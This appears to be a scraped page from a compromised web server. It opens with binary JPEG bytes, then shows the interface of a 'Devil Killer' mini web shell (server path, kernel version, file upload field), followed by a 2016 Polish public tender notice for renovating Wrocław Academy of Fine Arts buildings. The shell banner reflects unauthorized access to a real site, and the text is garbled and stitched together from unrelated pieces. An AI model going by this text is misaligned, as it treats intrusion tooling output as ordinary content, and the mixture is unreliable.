JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160512/119646-N-2016.html

<p class="kh_header"><b>Wrocław: REMONT BUDYNKÓW ASP WE WROCŁAWIU, znak postępowania: ZP-7/05/2016</b><br>
<b>Numer ogłoszenia: 119646 - 2016; data zamieszczenia: 12.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 71 3438031, faks 71 3431558.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT BUDYNKÓW ASP WE WROCŁAWIU, znak postępowania: ZP-7/05/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES PRZEDMIOTU ZAMÓWIENIA ZADANIE NR 1 REMONT POMIESZCZEŃ DYDAKTYCZNYCH W BUDYNKU ASP PRZY UL. TRAUGUTTA 21 Przedmiotem zamówienia jest wykonanie robót budowlanych - remontowych w pomieszczeniach dydaktycznych   ASP  przy ul. Traugutta 21 we Wrocławiu. Remont obejmuje pomieszczenia: - w budynku  głównym   A - 107T, 108T, 109T, 205T 304T ,305T - w budynku D - pomieszczenie nr 005D, ściana zewnętrzna szczytowa - w budynku muzeum - pomieszczenia przynależne Roboty rozbiórkowe obejmują pomieszczenia 107T,108T, 109T i 305T. W ramach prac należy wykonać następujące roboty obejmujące : - rozbiórkę ścianek działowych ścianek murowanych, - rozbiórkę ścianki działowej drewnianej, - rozbiórkę regałów drewnianych, - demontaż brodzika stalowego  - rozebranie wykładzin podłogowych - demontaż ościeżnic drzwiowych - wywóz gruzu W pracowni 107T, 108T i 109T  należy wykonać  roboty  tynkarskie,  malarskie wykładzinowe , instalacyjne elektryczne i co. W Sali 205T należy ułożyć wykładzinę  podłogową PCV typu tarket i wykonać instalacyjne elektryczne. W sali 304T wykonać prace instalacyjne co. W pracowni 305T należy wykonać roboty w zakresie wyburzenia, tynkowania, zakładania stolarki budowlanej, roboty ciesielskie, instalacyjne co oraz roboty malarskie. W budynku D w pomieszczeniu  nr 005 należy wykonać roboty tynkarskie oraz malarskie. Wykonać poziomą izolację przeciwwilgociową metodą inekcji bezciśnieniowej w murze z cegły o normalnej twardości o głębokości 65cm po obwodzie ściany. Na ścianie zewnętrznej rozebrać obróbki blacharskie i wykonać nowe. Uszczelnić styki obróbek blacharskich z murem. W budynku muzeum wykonać roboty w zakresie  zakładania stolarki budowlanej , roboty ciesielskie instalacyjne co oraz malarskie. Zamawiający nie posiada pozwolenie na budowę, gdyż nie wymagają tego przepisy.  ZADANIE NR 2 REMONT POMIESZCZEŃ W BUDYNKU PRZY UL. MODRZEWSKIEGO 15/17 I PRZY PL. POLSKIM 3/4 Przedmiotem postępowania jest wykonanie robót budowlanych i instalacyjnych w budynkach przy ul. Modrzewskiego 15/17 i  pl. Polskim 3/4 we Wrocławiu. Remont w budynku przy ul Modrzewskiego obejmuje następujące pomieszczenia  : - Sala 104 M - malowanie ścian i sufitów farbami emulsyjnymi ,demontaż i montaż wykładzin PCV, skucie wierzchniej warstwy, wykonanie warstwy wyrównawczej ,gruntowanie posadzek, - Sala 310 M - malowanie ścian i sufitów, rur co ,  - Pracownia 200M (sala 201, korytarz i sala 2011B)- Malowanie ścian i sufitów, rur co - Sala 204 M, 209M - malowanie ścian i sufitów, rur co - Sufit korytarz na IIp.bud.M- demontaż płyt z włókiem mineralnych ,pomalowanie farbami emulsyjnymi i ponowny montaż, mycie detergentami konstrukcji stalowej sufitu. - Przedsionek Sali 117M , sala 118M i 119M - malowanie ścian i sufitów farbami emulsyjnymi, demontaż i montaż wykładzin PCV, warstwa wyrównawcza pod wykładzinę, - Sala 102M - wykonanie sufitu podwieszanego z płyt GK, montaż wentylacji, przebudowa instalacji elektrycznej z wykorzystaniem istniejących opraw, malowanie ścian i sufitów farbami emulsyjnymi, malowanie rur co, demontaż i montaż wykładzin PCV, warstwy wyrównawcze pod posadzkę z wykładziny, - Sala 103M - skucie glazury na ścianach, wykonanie gładzi gipsowych, malowanie ścian i sufitów, ułożenie wykładziny PCV, - Przedsionek przy sali 103M i 102M - malowanie ścian i sufitów, - Sala 401M,404M, 405M - przygotowanie powierzchni, malowanie farbami magnetycznymi ścian (jedno pomieszczenie), malowanie farbami emulsyjnymi ścian i sufitów  - Dziekanat AWiW 114M - malowanie ścian i sufitów farbami emulsyjnymi, rur co, demontaż wykładziny dywanowej , wyrównanie posadzek ,ułożenie wykładzin PCV, - Pokój 115M-malowanie ścian i sufitów farbami emulsyjnymi, - Dziekanat MiRZ 116M - malowanie ścian i sufitów farbami emulsyjnymi ,rur co farbami olejnymi - Przedsionek pom.114M i 115M - malowanie ścian i sufitów farbami emulsyjnymi, demontaż i montaż wykładzin PCV, warstwa wyrównawcza pod wykładzinę, - Pomieszczenie kasy 112M - montaż klimatyzatora bez jednostki zewnętrznej o mocy 2KW, próba szczelności, uruchomienie, wykonanie instalacji zasilającej klimatyzator, instalacja skroplin i kanału wentylacyjnego, roboty malarskie ścian i sufitów - Pracownia 512M/416M - montaż półek nadgrzejnikowych z konglomeratu, roboty malarskie ścian i sufitów Remont w budynku przy pl. Polskim 3/4  obejmuje następujące pomieszczenia  : - Korytarz na II piętrze bud.P- malowanie ścian farbami emulsyjnymi w kolorze szarym - Pracownia 1/2P - malowanie ścian i sufitów farbami emulsyjnymi - Pracownia 5P - rozebranie posadzki z parkietu, wykonanie posadzki cementowej wraz z cokolikami zbrojonej siatką stalową , - Pracownia 16P - malowanie ścian i sufitów farbami emulsyjnymi, malowanie cokołów, grzejników ,balustrad, stolarki drzwiowej, regałów farbami olejnymi, - Sala 115P - montaż wentylatora kanałowego wraz z instalacją zasilającą, wymiana szyby zespolonej na utwardzoną płytę PCV ,malowanie ścian i sufitów, - Pracownia 205P, 208P- malowanie ścian i sufitów, grzejników, rur kanalizacyjnych i wodociągowych, regałów, stolarki drzwiowej ,szaf metalowych, zlewu - Pracownia 209P - przecieranie tynków na ścianach i stropie, malowanie farbami emulsyjnymi ścian i sufitów, malowanie grzejników rur, regałów, stolarki drzwiowej, cyklinowanie posadzek z deszczółek, wymiana cokołów, lakierowanie, montaż i demontaż rusztowań  - Sala 318P kucie bruzd, montaż przewodów wcześniej zdemontowanych z koryt instalacyjnych, malowanie ścian i sufitów farbami emulsyjnymi , malowanie grzejników, rur kanalizacyjnych ,cyklinowanie posadzek i lakierowanie ,regulacja skrzydeł drzwiowych, - Gabinet Rektora w bud.P- demontaż korytek instalacyjnych, wykucie bruzd, ponowny montaż korytek w bruzdach, malowanie ścian i sufitów farbami emulsyjnymi, malowanie rur i grzejników farbami olejnymi, cyklinowanie i malowanie podłogi  z parkietu, malowanie lakierem drzwi , szafek ,odbudowy, - Sekretariat Rektora w bud P -  malowanie ścian i sufitów, grzejników co, rur  farbą olejną, zerwanie wykładziny dywanowej ,cyklinowanie i malowanie parkietu, lakierowanie drzwi i ościeży, - Gabinet Kanclerza w bud.P- wykucie otworu drzwiowego, wykucie ościeżnicy i  montaż w nowym otworze drzwiowym, malowanie ścian i sufitów farbą emulsyjną , malowanie grzejników i rur co, - Pracownia 321P- wymiana szyby zespolonej, montaż wentylatora wraz z instalacją elektryczną, malowanie ścian i sufitów farbami emulsyjnymi, rur kanalizacyjnych, wymiana zlewozmywaka, wymiana podejścia pod zlewozmywak, wymiana syfonu, montaż szafki pod zlewozmywak, - Sala 203P- dostawa i montaż klimatyzatora na konstrukcji podporowej, montaż instalacji skroplin i kanału wentylacyjnego, próba szczelności, uruchomienie ,wykonanie instalacji zasilającej, malowanie ścian i sufitów, montaż szafki meblowej   według załączonych   szkiców, - Sala 204P - demontaż -przebudowa konstrukcji podporowej montaż linek stalowych balustrady antresoli, malowanie farbami olejnymi konstrukcji, malowanie starych tynków wewnętrznych, montaż wykładziny z tworzyw sztucznych, uzupełnienie gładzi cementowej, ułożenie paneli podłogowych  - Sala 313P- montaż i demontaż stolarki drzwiowej, wykucie otworu drzwiowego, wykonanie przesklepień, wykonanie ścianki działowej z płyt GK, montaż instalacji elektrycznej gniazd, wyłączników, montaż rozdzielnicy elektrycznej, wykucie i montaż bruzd, kładzenie wykładzin z tworzyw sztucznych ,wykonanie warstw wyrównawczych pod posadzkami, malowanie ścian i sufitów , malowanie stolarki drzwiowej  Uwagi ogólne :  Litera M wskazuje lokalizację pomieszczenia w budynku przy ul. Modrzewskiego 15/17. Litera P wskazuje lokalizację pomieszczenia w budynku przy pl. Polskim 3/4. We wszystkich pomieszczeniach znajduje się wyposażenie, które na czas remontu należy wynieść i ponownie wnieść po  zakończeniu robot. Posadzki, stolarkę okienną i drzwiową w pomieszczeniach w których będzie prowadzony remont należy zabezpieczyć przed zniszczeniem. Wyłączniki, gniazda na ścianach przed malowaniem należy zdemontować i ponownie zamontować po robotach malarskich. Należy uwzględnić transport gruzu i materiałów z demontażu do miejsca składowania i wywiezienia na wysypisko śmieci. Prace malarskie poprzedzają roboty przygotowawcze drobne naprawy, szpachlowanie, demontaże sprzętu, obrazów i tp. Sprzęt elektroniczny zostaje zabezpieczony i przeniesiony przez Inwestora we własnym zakresie. Zamawiający nie posiada pozwolenie na budowę , gdyż nie wymagają tego przepisy.  ZADANIE NR 3 REMONT POMIESZCZEŃ W DOMU STUDENCKIM PRZY UL. POBOŻNEGO 9 Przedmiotem postępowania przetargowego jest wykonanie robót budowlanych i instalacyjnych  w  Domu Studenckim przy ul. H. Pobożnego 9 we Wrocławiu.  Remont obejmuje następujące pomieszczenia : - łazienka przy pokoju 102 - prace instalacyjne wodne i kanalizacyjne, uszczelniające silikonem urządzenia muszli, umywalki brodzik i wpusty w podłodze, - korytarz parteru- kasowanie zacieków, roboty malarskie ścian i sufitu, prace demontażowe, - klatka schodowa parteru-rowerowia - roboty malarskie ścian, sufitów, rur wodociągowych, - łazienki ogólnodostępne na IIIp i IVp - roboty instalacyjne demontażowe i montażowe baterii, brodzika i podejść oraz roboty malarskie farbami emulsyjnymi ścian i sufitów - łazienki ogólnodostępne na V p- wymiana baterii i silikonu uszczelniającego urządzenia sanitarne, czyszczenie ręczne płytek terakotowych, - magazyn na IIp - wymiana obudowy z płyt GK w miejscach wykonywanych podejść sanitarnych, malowanie ścian i sufitów, - kuchnia IIIp- roboty demontażowe, transportowe, wymiana blatów kuchennych połączona z wycinaniem otworów na płytę kuchenki i zlewozmywak, - pracownia Ip, i IIp- roboty transportowe, malowanie ścian i sufitów, rur ,stolarki drzwiowej, demontaż i montaż wykładzin PCV - pokój 401, 402, 403A, 403B, przedsionka pokoju 403, 404, 405, 501, 502, 503A, 503B, 504 505, 602, -przygotowanie powierzchni, roboty demontażowe, malowanie ścian i sufitów farbami emulsyjnymi, rur kanalizacyjnych,odkręcanie zamocowanych łóżek, demontaż i montaż wyłączników i gniazd, - kuchnia na Vp- malowanie ścian i sufitów farbami emulsyjnymi. Uwagi ogólne :  We wszystkich pomieszczeniach znajduję się wyposażenie, które na czas remontu należy wynieść i ponownie wnieść po zakończeniu robot. Posadzki, stolarkę okienną i drzwiową  w pomieszczeniach w których będzie prowadzony remont należy zabezpieczyć przed zniszczeniem. Wyłączniki, gniazda na ścianach przed malowaniem należy zdemontować i ponownie zamontować po robotach malarskich. Należy uwzględnić transport gruzu i materiałów z demontażu do miejsca składowania i wywiezienia na wysypisko śmieci.   Zamawiający nie posiada pozwolenie na budowę , gdyż nie wymagają tego przepisy.  3.Prace będą wykonywane w czynnym budynku, przy ruchu ciągłym. Pomieszczenia będą przekazywane sukcesywnie zgodnie z harmonogramem robót ustalonym z Zamawiającym. Wymaga będzie staranność w utrzymaniu porządku w ww. obiekcie m.in. poprzez zabezpieczenie narażonych na zniszczenia elementów. 4.Szczegółowy zakres robót opisują: a) Specyfikacje Techniczne Wykonania i Odbioru Robot (STWiOR) - stanowiące załącznik nr 10 do SIWZ Ww. dokumentacja jest podstawą do wykonania zadania.  Zamawiający dołączył wyłącznie poglądowo przedmiary robót - stanowiące załącznik nr 9 do SIWZ.  5.Wymagany minimalny okres gwarancji jakości i rękojmi na zrealizowane roboty budowlane wynosi 60 miesięcy. Okres gwarancji liczony będzie od daty podpisania przez Zamawiającego końcowego protokołu odbioru. Warunki gwarancji na roboty budowlane zostały określone w projekcie umowy stanowiącym załącznik nr 8 do SIWZ.  6.Szczegółowe warunki i zasady realizacji umowy określa projekt umowy -załączniki nr 8 do niniejszej SIWZ.  Zaleca się, aby Wykonawcy dokonali wizji lokalnej terenu budowy przed złożeniem oferty. Zamawiający ustala termin wizji lokalnej na dzień 16-05-2016. W celu uczestnictwa w wizji Wykonawcy proszeni są o przybycie do siedziby Zamawiającego: dla zadania nr 1 na godz. 9.00 - ul. Traugutta 21 we Wrocławiu, budynek CSU,  pokój 517 V piętro.  dla zadania nr 2 na godz. 11.00 - Pl. Polski 3/4 we Wrocławiu, pokój 217 II piętro. dla zadania nr 3 na godz. 13.00 - Dom Studencki przy ul. H. Pobożnego 9 we Wrocławiu, parter 01 Administracja.  Osobą odpowiedzialną ze strony Zamawiającego za przeprowadzenie wizji lokalnej będzie Grzegorz Dąbrowski, Leszek Domagalski.  Z przeprowadzonej wizji lokalnej zostanie sporządzona notatka, która będzie udostępniona na stronie internetowej oraz na tablicy ogłoszeń Zmawiającego. W związku z powyższym wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny. Koszt wizji lokalnej ponosi Wykonawca. 7. Zamawiający dopuszcza składanie ofert częściowych. Oferty częściowe mogą zostać złożone na każde z zadań wyodrębnionych przez Zamawiającego i oznaczonych odpowiednio numerami: zadanie nr 1, zadanie nr 2, zadanie nr 3. Oferta na każde zadanie podlega odrębnej ocenie przez Zamawiającego. Wykonawca musi złożyć ofertę na cały asortyment określony dla danego zadania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.31.70.00-2, 45.41.00.00-4, 45.33.11.00-7, 45.43.21.11-5, 45.44.21.00-8, 45.42.00.00-7, 45.33.20.00-3, 45.43.21.11-5, 45.26.13.00-7, 45.26.14.20-4, 45.32.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający nie wymaga wniesienia wadium dla zadania nr 1 i zadania nr 3. 2. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium dla zadania nr 2. Zamawiający ustala kwotę wadium na: Zadanie nr 2 REMONT POMIESZCZEŃ W BUDYNKU PRZY UL. MODRZEWSKIEGO 15/17 I PRZY PL. POLSKIM 3/4   7 000,00 zł (siedem tysięcy złotych 00/100) 3.Wadium może być wnoszone w następujących formach:1) w pieniądzu,2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,3) gwarancjach bankowych,4) gwarancjach ubezpieczeniowych,5) poręczeniach bankowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).4. Wadium Wykonawca musi wnieść przed upływem terminu składania ofert tj. do 31-05-2016r. do godz. 10:00, na cały okres ważności oferty i nie może zawierać żadnych ograniczeń sprzecznych z ustawą, w szczególności ograniczających możliwość zrealizowania praw określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: ING Bank Śląski S.A. o/Wrocław nr 93 1050 1575 1000 0005 0269 6594,  z podaniem nazwy przetargu - wadium na przetarg ZP-7/05/2016, zadanie nr 2  6. Wniesienie wadium w pieniądzu, w formie przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert tj. do 31-05-2016r. do godz. 10:00.  7. Wadium wnoszone w innej formie niż pieniądz winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego. 8. Oryginał dokumentu wadialnego ma być zdeponowany w Kasie ASP we Wrocławiu. Wadium można składać od poniedziałku do piątku w godz. 12:00-14:00, a w dniu otwarcia ofert od godz. 8:30 (pok. 111, Ip). 9. Zaleca się, aby do oferty Wykonawca załączył kserokopię wpłaty wadium (w przypadku wniesienia wadium w formie pieniężnej), w pozostałych przypadkach kopię dokumentu wadialnego. 10.Zamawiający zwraca wadium zgodnie z art. 46 ust. 1, 1a, 2, 4 ustawy Pzp. 11. Zamawiający zatrzymuje wadium zgodnie z art. 46 ust. 4a, 5. 12.Zamawiający żąda ponownego wniesienia wadium zgodnie z art. 46 ust. 3.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że należycie wykonał tj. zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej: w zakresie zadania nr 1: jedną robotę budowlaną o wartości nie mniejszej niż 100 000,00 zł brutto w ramach jednej umowy, w zakres której wchodzi remont pomieszczeń,  w zakresie zadania nr 2: jedną robotę budowlaną o wartości nie mniejszej niż 250 000,00 zł brutto w ramach jednej umowy, w zakres której wchodzi remont pomieszczeń, w zakresie zadania nr 3: jedną robotę budowlaną o wartości nie mniejszej niż 30 000,00 zł brutto w ramach jednej umowy, w zakres której wchodzi remont pomieszczeń. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia przez Wykonawcę warunku dysonowania odpowiednim potencjałem technicznym Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. (oryginał). Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia powinien wykazać, że na czas realizacji zamówienia będzie dysponował osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. nr 243, poz. 1623 z poźn. zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006r. nr 83 poz. 578 z poźn. zm.) lub których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych: w zakresie zadania nr 1, zadania nr 2, zadania nr 3 kierownik budowy posiadający uprawnienia budowlane do kierowania budową lub robotami budowlanymi w specjalności konstrukcyjno-budowlanej Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy Pzp - złącznik nr 3 do SIWZ (oryginał). Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
